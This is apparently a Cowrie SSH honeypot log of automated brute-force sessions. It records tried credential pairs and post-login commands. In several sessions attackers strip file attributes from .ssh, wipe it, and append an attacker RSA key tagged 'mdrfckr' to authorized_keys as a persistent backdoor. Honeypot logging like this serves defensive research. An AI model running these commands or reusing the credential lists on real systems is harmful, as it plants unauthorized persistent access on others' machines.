{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:52:08.455217Z","src_ip":"212.227.235.229","session":"141031fb4ba6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36974,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2ec3aec9379","protocol":"ssh","message":"New connection: 212.227.235.229:36974 (1.2.3.4:22) [session: d2ec3aec9379]","sensor":"my-vps","timestamp":"2025-09-08T13:52:28.382919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:52:28.383840Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:52:28.508783Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa@112211","message":"login attempt [root/Aa@112211] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:52:29.051802Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":45038,"dst_ip":"1.2.3.4","dst_port":22,"session":"f71fffd32f0c","protocol":"ssh","message":"New connection: 134.199.174.250:45038 (1.2.3.4:22) [session: f71fffd32f0c]","sensor":"my-vps","timestamp":"2025-09-08T13:52:29.275493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:52:29.276121Z","src_ip":"134.199.174.250","session":"f71fffd32f0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:52:29.319919Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:52:29.320715Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:52:29.322093Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:52:29.448247Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:52:29.568934Z","src_ip":"134.199.174.250","session":"f71fffd32f0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:52:29.804582Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:52:29.805384Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:52:29.933091Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:52:29.934249Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36986,"dst_ip":"1.2.3.4","dst_port":22,"session":"dac374f48e8a","protocol":"ssh","message":"New connection: 212.227.235.229:36986 (1.2.3.4:22) [session: dac374f48e8a]","sensor":"my-vps","timestamp":"2025-09-08T13:52:30.044489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:52:30.045105Z","src_ip":"212.227.235.229","session":"dac374f48e8a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:52:30.161999Z","src_ip":"212.227.235.229","session":"dac374f48e8a"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"pass123","message":"login attempt [www-data/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:52:30.637382Z","src_ip":"134.199.174.250","session":"f71fffd32f0c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:52:30.668385Z","src_ip":"212.227.235.229","session":"dac374f48e8a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:52:31.786822Z","src_ip":"212.227.235.229","session":"dac374f48e8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37736,"dst_ip":"1.2.3.4","dst_port":22,"session":"7feea1b7379c","protocol":"ssh","message":"New connection: 212.227.235.229:37736 (1.2.3.4:22) [session: 7feea1b7379c]","sensor":"my-vps","timestamp":"2025-09-08T13:52:31.903779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:52:31.904555Z","src_ip":"212.227.235.229","session":"7feea1b7379c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:52:32.022610Z","src_ip":"212.227.235.229","session":"7feea1b7379c"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:52:32.056109Z","src_ip":"134.199.174.250","session":"f71fffd32f0c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:52:32.533099Z","src_ip":"212.227.235.229","session":"7feea1b7379c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:52:32.652224Z","src_ip":"212.227.235.229","session":"7feea1b7379c"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:52:32.656632Z","src_ip":"212.227.235.229","session":"d2ec3aec9379"}
{"eventid":"cowrie.session.connect","src_ip":"49.64.85.138","src_port":47372,"dst_ip":"1.2.3.4","dst_port":22,"session":"291173da77cd","protocol":"ssh","message":"New connection: 49.64.85.138:47372 (1.2.3.4:22) [session: 291173da77cd]","sensor":"my-vps","timestamp":"2025-09-08T13:52:43.267676Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:52:43.268342Z","src_ip":"49.64.85.138","session":"291173da77cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:52:43.460374Z","src_ip":"49.64.85.138","session":"291173da77cd"}
{"eventid":"cowrie.login.success","username":"root","password":"dedicated1","message":"login attempt [root/dedicated1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:52:44.270033Z","src_ip":"49.64.85.138","session":"291173da77cd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:52:44.673594Z","src_ip":"49.64.85.138","session":"291173da77cd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:52:44.674377Z","src_ip":"49.64.85.138","session":"291173da77cd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:52:44.675359Z","src_ip":"49.64.85.138","session":"291173da77cd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:52:44.868847Z","src_ip":"49.64.85.138","session":"291173da77cd"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":59884,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfa7c36f69c2","protocol":"ssh","message":"New connection: 134.199.174.250:59884 (1.2.3.4:22) [session: dfa7c36f69c2]","sensor":"my-vps","timestamp":"2025-09-08T13:52:58.411861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:52:58.412988Z","src_ip":"134.199.174.250","session":"dfa7c36f69c2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:52:58.720066Z","src_ip":"134.199.174.250","session":"dfa7c36f69c2"}
{"eventid":"cowrie.login.failed","username":"www-data","password":"123abc","message":"login attempt [www-data/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:52:59.993446Z","src_ip":"134.199.174.250","session":"dfa7c36f69c2"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:01.447099Z","src_ip":"134.199.174.250","session":"dfa7c36f69c2"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":14495,"dst_ip":"1.2.3.4","dst_port":22,"session":"64cf6eaa561a","protocol":"ssh","message":"New connection: 49.247.35.31:14495 (1.2.3.4:22) [session: 64cf6eaa561a]","sensor":"my-vps","timestamp":"2025-09-08T13:53:07.579756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:53:07.598037Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:53:07.880449Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
{"eventid":"cowrie.login.success","username":"root","password":"oldpassword#123","message":"login attempt [root/oldpassword#123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:53:09.037458Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:53:09.690367Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:53:09.691370Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:53:09.692101Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:53:09.982934Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:53:10.632199Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:53:10.632885Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:53:10.922261Z","src_ip":"49.247.35.31","session":"64cf6eaa561a"}
